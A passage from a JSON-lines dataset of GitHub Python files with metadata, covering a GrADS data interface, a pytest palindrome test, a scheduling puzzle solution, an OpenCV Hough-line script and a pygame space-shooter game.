self.flush(encoding=encoding)\n break\n else:\n handle.write(chunk)\n # If GrADS is sane, normal behavior is to return the array of grid points\n # big enough to completely enclose or overlap the set domain.\n dimlengths = [getattr(env, 'n'+dim) for dim in dims]\n guess_shape = tuple(dimlengths)\n guess_size = int(np.prod(guess_shape))\n try:\n # Convert binary data to 32-bit floats\n arr = np.fromstring(handle.getvalue(), dtype=np.float32)\n except:\n raise PygradsError('Problems occurred while exporting GrADS expression: '+expr\n +'\\nCommon reasons:'\n +'\\n\\t1) Dimensions which are fixed/varying in the expression '\n +'\\n\\t must be fixed/varying in the GrADS environment.'\n +'\\n\\t2) One or more of your GrADS dimensions may extend out of bounds.')\n # If all is sane and expected\n if arr.size == guess_size:\n shape = guess_shape\n else:\n # For whatever reason, GrADS will sometimes return a grid offset\n # by an index or two from what the dimension environment says it\n # should be (e.g. nx*ny for an x-y field). To work around this,\n # test a few perturbations around the expected size of a single\n # dimension at a time and see if any of them work.\n possible_shapes = []\n dim_ranges = []\n for n in dimlengths:\n if n > 2:\n r = range(n-2, n+3)\n else:\n r = range(1, n+3)\n dim_ranges.append(r)\n # Remember, dim order determines how the shape tuples here are ordered\n possible_shapes = list(product(*dim_ranges))\n possible_sizes = [np.prod(shape) for shape in possible_shapes]\n # Actual shape of the grid. This assumes that if multiple possible\n # shapes have the same size, the first one that works is correct.\n # This will not always be true...blame GrADS for having unpredictable\n # grid sizes\n shape = possible_shapes[possible_sizes.index(arr.size)]\n arr = arr.reshape(shape)\n arr[arr == self.MISSING] = np.nan\n # Close stream\n self.cmd('disable fwrite', verbose=False)\n # Restore gxout settings, assuming typical 2D scalar field plot\n self.cmd('set gxout '+env.gx2Dscalar, verbose=False)\n return arr\n\n###############################################\n# GrADS Environment Handle #\n###############################################\nclass GaEnv:\n def __init__(self, ga, query='all'):\n \"\"\"\n Container for holding GrADS dimension and display environment data.\n The information is derived from GrADS query commands ['dims','gxout'].\n A specific query may be requested if only one is needed. Default\n is to load all supported queries.\n \"\"\"\n # Query dims\n if query in ('dims', 'all'):\n qdims, rc = ga.cmd('query dims', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query dims\"')\n\n # Current open file ID\n self.fid = int(qdims[0].split()[-1])\n # Which dimensions are varying or fixed?\n self.xfixed = 'fixed' in qdims[1]\n self.yfixed = 'fixed' in qdims[2]\n self.zfixed = 'fixed' in qdims[3]\n self.tfixed = 'fixed' in qdims[4]\n self.efixed = 'fixed' in qdims[5]\n\n # Get the dimension values. These are single numbers if the dimension\n # is fixed, or a tuple of (dim1, dim2) if the dimension is varying.\n # Grid coordinates x,y,z,t,e can be non-integers for varying dimensions,\n # but it is useful to have the \"proper\" integer grid coordinates xi,yi,zi,ti,ei.\n # If a dimension is fixed, GrADS automatically rounds non-integer dimensions\n # to the nearest integer.\n xinfo = qdims[1].split()\n if self.xfixed:\n self.lon = float(xinfo[5])\n self.x = float(xinfo[8])\n self.xi = int(np.round(self.x))\n else:\n self.lon = (float(xinfo[5]), float(xinfo[7]))\n self.x = (float(xinfo[10]), float(xinfo[12]))\n self.xi = (int(np.floor(self.x[0])), int(np.ceil(self.x[1])))\n yinfo = qdims[2].split()\n if self.yfixed:\n self.lat = float(yinfo[5])\n self.y = float(yinfo[8])\n self.yi = int(np.round(self.y))\n else:\n self.lat = (float(yinfo[5]), float(yinfo[7]))\n self.y = (float(yinfo[10]), float(yinfo[12]))\n self.yi = (int(np.floor(self.y[0])), int(np.ceil(self.y[1])))\n zinfo = qdims[3].split()\n if self.zfixed:\n self.lev = float(zinfo[5])\n self.z = float(zinfo[8])\n self.p = float(zinfo[5])\n self.zi = int(np.round(self.z))\n else:\n self.lev = (float(zinfo[5]), float(zinfo[7]))\n self.z = (float(zinfo[10]), float(zinfo[12]))\n self.p = (float(zinfo[5]), float(zinfo[7]))\n self.zi = (int(np.floor(self.z[0])), int(np.ceil(self.z[1])))\n tinfo = qdims[4].split()\n if len(tinfo[5]) > 12:\n timefmt = '%H:%MZ%d%b%Y'\n else:\n timefmt = '%HZ%d%b%Y'\n if self.tfixed:\n self.time = datetime.strptime(tinfo[5], timefmt)\n self.t = float(tinfo[8])\n self.ti = int(np.round(self.t))\n else:\n self.time = (datetime.strptime(tinfo[5], timefmt),\n datetime.strptime(tinfo[7], timefmt))\n self.t = (float(tinfo[10]), float(tinfo[12]))\n self.ti = (int(np.floor(self.t[0])), int(np.ceil(self.t[1])))\n einfo = qdims[5].split()\n if self.efixed:\n self.e = float(einfo[8])\n self.ei = int(np.round(self.e))\n else:\n self.e = (float(einfo[10]), float(einfo[12]))\n self.ei = (int(np.floor(self.e[0])), int(np.ceil(self.e[1])))\n\n # Dimension lengths in the current environment.\n # Different from total dimension length in the file (see ctlinfo)\n if self.xfixed:\n self.nx = 1\n else:\n self.nx = self.xi[1] - self.xi[0] + 1\n if self.yfixed:\n self.ny = 1\n else:\n self.ny = self.yi[1] - self.yi[0] + 1\n if self.zfixed:\n self.nz = 1\n else:\n self.nz = self.zi[1] - self.zi[0] + 1\n if self.tfixed:\n self.nt = 1\n else:\n self.nt = self.ti[1] - self.ti[0] + 1\n if self.efixed:\n self.ne = 1\n else:\n self.ne = self.ei[1] - self.ei[0] + 1\n\n # Rank of the environment space (number of dimensions)\n self.rank = sum([not d for d in\n [self.xfixed,self.yfixed,self.zfixed,self.tfixed,self.efixed]])\n\n # Query ctlinfo\n if query in ('ctlinfo', 'all'):\n qctl, rc = ga.cmd('query ctlinfo', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query ctlinfo\"')\n # Total dimension lengths in the file\n self.Ne = 1\n for line in qctl:\n if 'xdef ' in line or 'XDEF ' in line:\n self.Nx = int(line.split()[1])\n elif 'ydef ' in line or 'YDEF ' in line:\n self.Ny = int(line.split()[1])\n elif 'zdef ' in line or 'ZDEF ' in line:\n self.Nz = int(line.split()[1])\n elif 'tdef ' in line or 'TDEF ' in line:\n self.Nt = int(line.split()[1])\n # EDEF section may or may not be present\n elif 'edef ' in line or 'EDEF ' in line:\n self.Ne = int(line.split()[1])\n\n # Query gxout\n if query in ('gxout', 'all'):\n qgxout, rc = ga.cmd('query gxout', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query gxout\"')\n # gxout defines graphics types for 1D scalar plots, 1D vector plots,\n # 2D scalar plots, and 2D vector plots.\n # Map GrADS graphic identifiers to gxout commands. Note that \"gxout stat\"\n # and \"gxout print\" do not change the output of \"query gxout\"\n graphicTypes = {'Contour': 'contour', 'Line': 'line', 'Barb': 'barb',\n '16': 'shaded', '17': 'shade2b', 'Shaded': 'shade1',\n 'Vector': 'vector', 'Shapefile': 'shp', 'Bar': 'bar',\n 'Grid': 'grid', 'Grfill': 'grfill', 'Stream': 'stream',\n 'Errbar': 'errbar', 'GeoTIFF': 'geotiff', 'Fgrid': 'fgrid',\n 'ImageMap': 'imap', 'KML': 'kml', 'Linefill': 'linefill',\n 'Scatter': 'scatter', 'Fwrite': 'fwrite', '0': None}\n\n # Get current graphics settings\n self.gx1Dscalar = graphicTypes[qgxout[1].split()[-1]]\n self.gx1Dvector = graphicTypes[qgxout[2].split()[-1]]\n self.gx2Dscalar = graphicTypes[qgxout[3].split()[-1]]\n self.gx2Dvector = graphicTypes[qgxout[4].split()[-1]]\n stationData = qgxout[5].split()[-1]\n if stationData == '6':\n self.stationData = None\n else:\n self.stationData = stationData\n\n # Query gxinfo\n if query in ('gxinfo', 'all'):\n qgxinfo, rc = ga.cmd('query gxinfo', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query gxinfo\"')\n # Get page limits and the current plot's limits in page coordinates\n line1 = qgxinfo[1].split()\n self.pagewidth, self.pageheight = line1[3], line1[5]\n line2 = qgxinfo[2].split()\n self.Xplot = (float(line2[3]), float(line2[5]))\n line3 = qgxinfo[3].split()\n self.Yplot = (float(line3[3]), float(line3[5]))\n", "repo_name": "meridionaljet/py3grads", "sub_path": "py3grads/gacore.py", "file_name": "gacore.py", "file_ext": "py", "file_size_in_byte": 24365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 75, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 75, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 263, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 305, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 333, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 361, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 394, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 461, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 468, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 468, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 470, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 472, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 472, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 473, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 473, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 482, "usage_type": "call"}]} +{"seq_id": "6950993482", "text": "from ....problems.Two_Pointers.Valid_Palindrome import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(\n \"s, expected\",\n [\n (\"A man, a plan, a canal: Panama\", True),\n (\"race a car\", False),\n (\" \", True)\n ]\n)\ndef test_is_palindrome_parametrize(s: str, expected: bool) -> bool:\n test = Solution()\n\n assert test.isPalindrome(s) == expected\n", "repo_name": "LuisAPC/pytest_with_Leetcode", "sub_path": "tests/problems/Two_Pointers/test_Valid_Palindrome.py", "file_name": "test_Valid_Palindrome.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "problems.Two_Pointers.Valid_Palindrome.Solution", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 5, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "73509932324", "text": "# 중복조합\nfrom itertools import combinations_with_replacement as comb_re\n\ndef solution(k, n, req):\n answer = float('inf')\n\n # 해당 과목에서 최대 배치 가능한 인원 수\n l = n - k + 1\n\n # 유형 배치도\n master_info = [[[float('inf'), float('inf')] for _ in range(l)] for _ in range(k)]\n\n def do_councel(councel_info, req=req):\n waiting_time = 0\n\n # 초기화\n for i in range(k):\n temp_councel_cnt = councel_info[i]\n for j in range(l):\n if j < temp_councel_cnt:\n master_info[i][j] = [0, 0]\n else:\n master_info[i][j] = [float('inf'), float('inf')]\n\n for mentee_info in req:\n req_time, spent_time, council_type = mentee_info\n\n # 해당 유형의 멘토들 상담 정보\n mento_timetable = master_info[council_type - 1]\n\n # 종료시간이 제일 빠른 순으로 정렬되어 있는 리스트의 첫 항목\n mento_info = mento_timetable[0]\n\n # 멘토_인포 = [종료시간, 시작시간]\n curr_end = mento_info[0]\n no_delay = curr_end <= req_time\n\n if no_delay:\n mento_info[1] = req_time\n mento_info[0] = req_time + spent_time\n else:\n waiting_time += mento_info[0] - req_time\n if waiting_time > answer:\n return float('inf')\n\n mento_info[1] = mento_info[0]\n mento_info[0] += spent_time\n\n # 각 항목의 멘토 시간 정보 중 0번 인덱스가 제일 일찍 끝나는 멘토 시간 정보가 되도록 정렬\n master_info[council_type - 1].sort()\n\n return waiting_time \n\n\n def set_schedule():\n nonlocal answer\n\n for arr in list(comb_re(range(k), n - k)):\n councel_info = [1] * k\n for idx in arr:\n councel_info[idx] += 1\n answer = min(answer, do_councel(councel_info))\n\n set_schedule()\n\n return answer", "repo_name": "caddyspoon/Algorithms_Breaker", "sub_path": "2023/08/pg214188_councel_schedules.py", "file_name": "pg214188_councel_schedules.py", "file_ext": "py", "file_size_in_byte": 2078, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations_with_replacement", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "73247720805", "text": "import numpy as np\nfrom PIL import Image\nimport cv2\nimport math\nimport statistics\n\ndata = np.load(\"test.npy\")\n# Transform array into image\nimg = Image.fromarray(np.uint8(data[3] * 255), 'L')\nimg.show()\nimg.save(\"img.jpg\")\n# Read Image\nimg2 = cv2.imread('img.jpg')\n\n# Find the edges in the image using canny detector\nedges = cv2.Canny(img2, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLines(edges, 1, np.pi/360, 150)\n\nangle = []\nfor i in lines:\n rho = i[0][0]\n theta = i[0][1]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img2, (x1, y1), (x2, y2), (0, 0, 255), 2)\n c = math.degrees(math.atan2(y2-y1, x2-x1))\n angle.append(abs(c))\nprint(angle[0:4])\na_mean = statistics.mean(angle[0:4])\nprint(180-a_mean)\n", "repo_name": "gjbergues/Dial", "sub_path": "hough.py", "file_name": "hough.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.HoughLines", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 33, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 34, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 34, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "4971309591", "text": "import pygame\nimport os\nimport sys \nimport random\n\n\"\"\"\n\nIdea: \n* Space shooter type game where you are a triangle, and move around shooting different shapes like circles, squares, and more that are chasing you.\n* You will have to survive waves of enemies, once a wave is over a new one starts. The goal is to survive 5 waves of enemies to win.\n* You will be able to buy upgrades between waves.\n\nSteps to create game idea:\n1. Game window - [Done]\n2. Make player character - [Done]\n3. Let the player move using WASD or Arrow keys - [Done]\n4. Implement shooting mechanic - [Done]\n5. Implement max_health to player and enemy types - [Done]\n6. Implement enemy and collision so that once an enemy is hit a certain amount of times they die - [Done]\n7. Implement wave system - [Done]\n\nDisclaimer: The sound effects and music are not mine, I optain them from (Pixabay.com) all the credit goes to the authors that created them. \n\"\"\"\n\npygame.init() \npygame.mixer.init()\n\nclass Ship:\n def __init__(self, x, y, health):\n self.x = x\n self.y = y\n self.health = health\n self.ship_image = None\n\n def draw(self, screen):\n screen.blit(self.ship_image, (self.x, self.y))\n \nGREEN_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"player.png\")), (80,80))\nclass Player(Ship):\n def __init__(self, x, y, health):\n super().__init__(x, y, health)\n self.ship_image = GREEN_SPACE_SHIP\n self.mask = pygame.mask.from_surface(self.ship_image)\n self.max_health = health\n self.lasers = []\n self.rect = self.ship_image.get_rect(topleft=(x, y))\n\nPLAYER_LASER = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"laser.png\")), (20,20))\nclass Laser:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n self.rect = self.img.get_rect(topleft=(self.x, self.y))\n\n def draw(self, screen):\n screen.blit(self.img, (self.x, self.y))\n\n def move(self, y):\n self.y -= y\n self.rect.y = self.y\n\n def check_collision(self, enemies):\n for enemy in enemies:\n enemy_mask = pygame.mask.from_surface(enemy.ship_image)\n offset = (int(enemy.x - self.x), int(enemy.y - self.y))\n\n if self.mask.overlap(enemy_mask, offset):\n return enemy\n\n return None\n \nBOSS_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"boss_enemy.png\")), (200, 200)) \nTANK_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"tank_enemy.png\")), (110,110)) \nNORMAL_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"normal_enemy.png\")), (70,70)) \nFAST_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"fast_enemy.png\")), (40,40)) \nclass Enemy(Ship):\n ENEMY_TYPES = {\n \"boss\": BOSS_SPACE_SHIP,\n \"tank\": TANK_SPACE_SHIP,\n \"normal\": NORMAL_SPACE_SHIP,\n \"fast\": FAST_SPACE_SHIP\n }\n\n ENEMY_SPEEDS = {\n \"boss\": 0.4,\n \"tank\": 1, \n \"normal\": 1.2,\n \"fast\": 1.5\n }\n\n def __init__(self, x, y, health, enemy_type):\n super().__init__(x, y, health)\n self.ship_image = self.ENEMY_TYPES[enemy_type]\n self.mask = pygame.mask.from_surface(self.ship_image)\n self.rect = self.ship_image.get_rect(topleft=(self.x, self.y))\n self.speed = self.ENEMY_SPEEDS[enemy_type]\n\n def move(self):\n self.y += self.speed\n self.rect.y = self.y\n \n def take_damage(self, damage):\n self.health -= damage\n\n def is_dead(self):\n return self.health <= 0\n\ndef main():\n\n LASER_SOUND_FILE = \"spaceshooter_assets/laser_sound.mp3\"\n BOSS_BATTLE_SOUND_FILE = \"spaceshooter_assets/boss_sound.mp3\"\n BACKGROUND_SOUND_FILE = \"spaceshooter_assets/background_sound.mp3\"\n BOSS_SPAWN_SOUND_FILE = \"spaceshooter_assets/boss-spawn_sound.mp3\" \n GAME_WON_SOUND = \"spaceshooter_assets/game-won_sound.mp3\"\n GAME_LOST_SOUND = \"spaceshooter_assets/game-over_sound.mp3\"\n\n def play_sound(sound_file, volume=1.0):\n sound = pygame.mixer.Sound(sound_file)\n sound.set_volume(volume)\n sound.play()\n\n WIDTH, HEIGHT = 1000, 800\n FPS = 60\n wave = 0\n enemies = []\n player_velocity = 8\n player_size = 80\n score = 0\n\n main_font = pygame.font.SysFont(\"comicsans\", 30)\n wave_font = pygame.font.SysFont(\"comicsans\", 50)\n white_font_color = ((255,255,255))\n clock = pygame.time.Clock()\n\n # Player ship\n player_ship = Player(WIDTH / 2, HEIGHT - 60, 100)\n\n # Background Image\n pygame.display.set_caption(\"Space Invaders\")\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n image_path = os.path.join(\"spaceshooter_assets\", \"nightsky.png\")\n BG_IMG = pygame.transform.scale(pygame.image.load(image_path), (WIDTH, HEIGHT))\n \n def redraw_window(screen, bg_img):\n screen.blit(bg_img, (0, 0))\n\n #Wave label fade after 3 seconds\n wave_label = wave_font.render(f\"Wave {wave}\", 1, white_font_color)\n current_time = pygame.time.get_ticks()\n \n if wave == 1 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n elif wave == 2 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n elif wave == 3 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n elif wave == 4 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n elif wave == 5 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n\n # Game screen info \n health_label = main_font.render(f\"Health: {player_ship.health}\", 1, white_font_color)\n score_label = main_font.render(f\"Score: {score}\", 1, white_font_color)\n screen.blit(health_label, (10, 10))\n screen.blit(score_label, (WIDTH - score_label.get_width() - 10, 10))\n\n # Player starting position\n player_ship.draw(screen)\n\n #Updated and draw lasers\n for laser in player_ship.lasers[:]:\n laser.draw(screen)\n laser.move(10) \n\n #Remove lasers that hit the top of the screen\n if laser.y < 0:\n player_ship.lasers.remove(laser)\n\n # Update and draw enemies\n for enemy in enemies[:]:\n enemy.draw(screen)\n enemy.move()\n\n #Player loss - remove everything from the screen\n if player_ship.health <= 0:\n enemies.remove(enemy)\n\n #Remove enemies that hit the bottom of the screen and take away health\n if enemy.y > HEIGHT:\n if enemy.ship_image == BOSS_SPACE_SHIP:\n player_ship.health = 0\n enemies.remove(enemy)\n else:\n player_ship.health -= 5\n enemies.remove(enemy)\n\n # Player Win! Draw\n if (len(enemies) == 0 and wave >= 5) and player_ship.health > 0:\n win_label = main_font.render(\"YOU WIN!\", 1, white_font_color)\n screen.blit(win_label, ((WIDTH - win_label.get_width()) // 2, (HEIGHT - win_label.get_height()) // 2))\n # Player Loss! Draw\n elif player_ship.health <= 0:\n lost_label = main_font.render(\"GAME OVER!\", 1, white_font_color)\n screen.blit(lost_label, ((WIDTH - lost_label.get_width()) // 2, (HEIGHT - lost_label.get_height()) // 2)) \n\n pygame.display.update()\n\n boss_spawned = False \n running = True\n switch_music = True\n start_time = pygame.time.get_ticks()\n stop_sound = True\n while running:\n clock.tick(FPS)\n current_time = pygame.time.get_ticks()\n redraw_window(screen, BG_IMG)\n\n # Event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n # Player shoots a laser\n play_sound(LASER_SOUND_FILE, 0.2)\n player_laser = Laser(player_ship.x + player_ship.ship_image.get_width() // 2 - PLAYER_LASER.get_width() // 2, player_ship.y, PLAYER_LASER)\n player_ship.lasers.append(player_laser)\n \n # Check for collision with enemies\n for laser in player_ship.lasers[:]:\n hit_enemy = laser.check_collision(enemies)\n if hit_enemy:\n score += 10\n hit_enemy.take_damage(40)\n player_ship.lasers.remove(laser)\n if hit_enemy.is_dead():\n enemies.remove(hit_enemy)\n\n # Enemy Spawner\n if (len(enemies) == 0 and wave < 5) and player_ship.health > 0:\n wave += 1\n start_time = current_time\n\n #Background music switch\n if wave <= 4 and switch_music:\n switch_music = False\n pygame.mixer.music.load(BACKGROUND_SOUND_FILE)\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n elif wave >= 5:\n pygame.mixer.music.load(BOSS_BATTLE_SOUND_FILE)\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n \n selectEnemy = [\"tank\", \"normal\", \"fast\"]\n for _ in range(wave * 8):\n enemy_type = random.choice(selectEnemy)\n if enemy_type == \"tank\":\n enemy_health = 120\n elif enemy_type == \"normal\":\n enemy_health = 80\n elif enemy_type == \"fast\":\n enemy_health = 40\n\n enemy = Enemy(random.randint(50, WIDTH - 100), random.randint(-1500, -100), enemy_health, enemy_type)\n enemies.append(enemy)\n elif wave >= 5 and not boss_spawned and player_ship.health > 0:\n #Wave 5 boss\n play_sound(BOSS_SPAWN_SOUND_FILE, 1.0)\n enemy = Enemy(random.randint(50, WIDTH - 100), random.randint(-1500, -100), 4000, \"boss\")\n enemies.append(enemy)\n boss_spawned = True\n \n # Player Wins! Sound\n if (len(enemies) == 0 and wave >= 5) and (player_ship.health > 0) and stop_sound:\n pygame.mixer.music.stop()\n play_sound(GAME_WON_SOUND, 1.0)\n stop_sound = False\n # Player Loss! Sound\n elif player_ship.health <= 0 and stop_sound:\n pygame.mixer.music.stop()\n play_sound(GAME_LOST_SOUND, 1.0)\n stop_sound = False\n \n \"\"\"\n The if statements checks both the keys pressed and the player's position. \n For example, it verifies whether a key is pressed and checks if the player is out of bounds before allowing movement. \n This approach enables the creation of a border or play area since we don't want the player to go beyond the screen.\n\n Player controls: WASD or Arrow keys\n Having this in the while loop allows continuous movement while the key is pressed.\n \"\"\"\n\n keys = pygame.key.get_pressed()\n if (keys[pygame.K_a] or keys[pygame.K_LEFT]) and player_ship.x - player_velocity > 0:\n player_ship.x -= player_velocity\n if (keys[pygame.K_d] or keys[pygame.K_RIGHT]) and player_ship.x + player_velocity + player_size < WIDTH:\n player_ship.x += player_velocity\n if (keys[pygame.K_w] or keys[pygame.K_UP]) and player_ship.y - player_velocity - player_size > 0:\n player_ship.y -= player_velocity\n if (keys[pygame.K_s] or keys[pygame.K_DOWN]) and player_ship.y + player_velocity + player_size < HEIGHT:\n player_ship.y += player_velocity\n\n pygame.quit() \n\n# Runs main\nmain()", "repo_name": "KerySeverino/MyPythonProjects", "sub_path": "Beginner_Projects/spaceshooter.py", "file_name": "spaceshooter.py", "file_ext": "py", "file_size_in_byte": 12430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, 